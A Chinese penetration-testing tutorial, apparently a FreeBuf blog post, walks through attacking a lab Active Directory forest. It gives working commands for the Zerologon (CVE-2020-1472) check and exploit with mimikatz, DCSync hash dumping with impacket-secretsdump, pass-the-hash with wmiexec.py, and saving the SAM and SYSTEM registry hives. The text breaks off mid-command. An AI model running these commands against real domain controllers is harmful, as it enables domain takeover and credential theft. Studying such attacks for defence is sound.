渗透测试之地基内网篇：域森林中实战攻防（中）

渗透测试之地基内网篇：域森林中实战攻防（中） – 作者:dayuxiyou

系列文章

专辑：渗透测试之地基篇

简介

渗透测试-地基篇

该篇章目的是重新牢固地基，加强每日训练操作的笔记，在记录地基笔记中会有很多跳跃性思维的操作和方式方法，望大家能共同加油学到东西。

请注意：

本文仅用于技术讨论与研究，对于所有笔记中复现的这些终端或者服务器，都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，本站及作者概不负责。

名言：

你对这行的兴趣，决定你在这行的成就！

一、前言

渗透测试人员需谨记《网络安全法》，根据《网络安全法》所示，未经授权的渗透测试都是不合法的，不管是出于何种目的。红队渗透人员在进行渗透期间，渗透测试的行为和项目必须在被渗透方授予权限可渗透后，才可进行渗透测试操作。

如今有一家dayu公司，需要对自己的业务以及整体的内网框架体系进行隐患挖掘，授予权限我进行对dayu公司的渗透测试操作，在签署了双方的《渗透测试授权书》后，我开始了对dayu公司的渗透之旅。

跳开思维讲，我此篇内容是内网渗透篇章，通过我的专栏：

社工钓鱼 -> 免杀过全杀软 -> 内网渗透

那么我通过了社工钓鱼的各种方式，将钓鱼文件进行免杀后，成功钓鱼到了该公司外围人员计算机，并控制了该计算机权限获得shell，并成功登录对方电脑。

通过前期对域用户大量的信息收集，画出了相对应的简单网络拓扑图，下一步需要进攻子域控制器，思路如下：

域普通用户 -> 子域控制器 -> 父域控制器 -> 辅域控制器 -> 财务独立域 -> 涉密系统

通过该思路进攻即可，还有另外一条思路：

域普通用户 -> 10.10.21.0/24二级区域 -> 父子域控制器 -> 横向延伸（财务独立域10.10.21.0/24）

渗透人员最爱系统之一有kali，还有各类windows集成的武器库系统，通过前几期的域森林专辑文章中利用隐藏通道技术、权限提升、横向攻击、域控安全技术、跨域攻击、置零攻击等手段对公司进行了大面积渗透行为，今天我们就来对域森林中进行实战攻防演练，利用前期学到的方法在内网中遨游！

二、环境介绍

目前信息收集获得的网络情况：（模拟环境）
拓扑图简介

1625103144_60dd1b284c6d7738fa39d.png!small?1625103144599

为了更好的演示接下来的渗透和回看总拓扑图公司搭建环境情况：

单篇：渗透测试之地基内网篇：域森林中父子域和辅域用户搭建分析

实战是结合所有知识思路的集合体，只有实战才能检验能力的时刻，也只有实战才能更快的进步和检验错误，接下来将介绍如何一步步攻破内网域森林环境！

三、CVE-2020-1472攻击域控

1、环境下载

mimikatz工具地址：

https://github.com/gentilkiwi/mimikatz
https://github.com/SecureAuthCorp/impacket

Kali上-impacket环境安装：

proxychains git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket/
sudo pip3 install .
sudo python3 setup.py install

pip3安装：
wget https://bootstrap.pypa.io/get-pip.py
python3 get-pip.py

2、免杀mimikatz并上传

参考：

专辑：渗透测试之地基篇

2、检测是否存在漏洞

CS上进行检测是否存在CVE-2020-1472漏洞：

1625103167_60dd1b3fa294577109acf.png!small?1625103170884

shell mimikatz "lsadump::zerologon /target:10.10.3.6 /account:XIYOU$" "exit"

回显Authentication: OK — vulnerable，是存在该漏洞情况，可以进行攻击！！

3、利用CVE-2020-1472修改域控密码为空

CS上利用mimikatz进行域控密码置空攻击：

1625103173_60dd1b45e41fc5d0d42ee.png!small?1625103176861

shell mimikatz "lsadump::zerologon /target:10.10.3.6 /account:XIYOU$ /exploit" "exit"

回显：

* Authentication: OK -- vulnerable
* Set password  : OK -- may be unstable

可看到成功置零hash！！

4、获取hash

先要挂上代理，使用proxychains进行隧道代理后利用域控凭证通过dcsync获取域管机器用户的hash：

1625103185_60dd1b51b44213453c2cc.png!small?1625103198160

proxychains impacket-secretsdump -no-pass -just-dc xiyou.dayu.com/XIYOU\[email protected]

5、横向攻击

可以破解出域管密码，使用net结合wmic、schtasks等远程执行命令方法离线获取保存在注册表中的域控凭证，也可以使用imapcket中的远程执行工具通过hash传递获取。

这里利用wmiexec.py进行横向攻击，wmiexec.py是kali自带的文件，搜索下即可！

1625103192_60dd1b58f336e6d087cc6.png!small?1625103198161

proxychains wmiexec.py -hashes :c515ba5a374ae93dd2018cab7edfb42d ./[email protected]

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
re

来源：freebuf.com 2021-07-01 09:27:33 by: dayuxiyou

文章版权归作者所有，未经允许请勿转载。

THE END

Freebuf
# d # i # day

喜欢就支持一下吧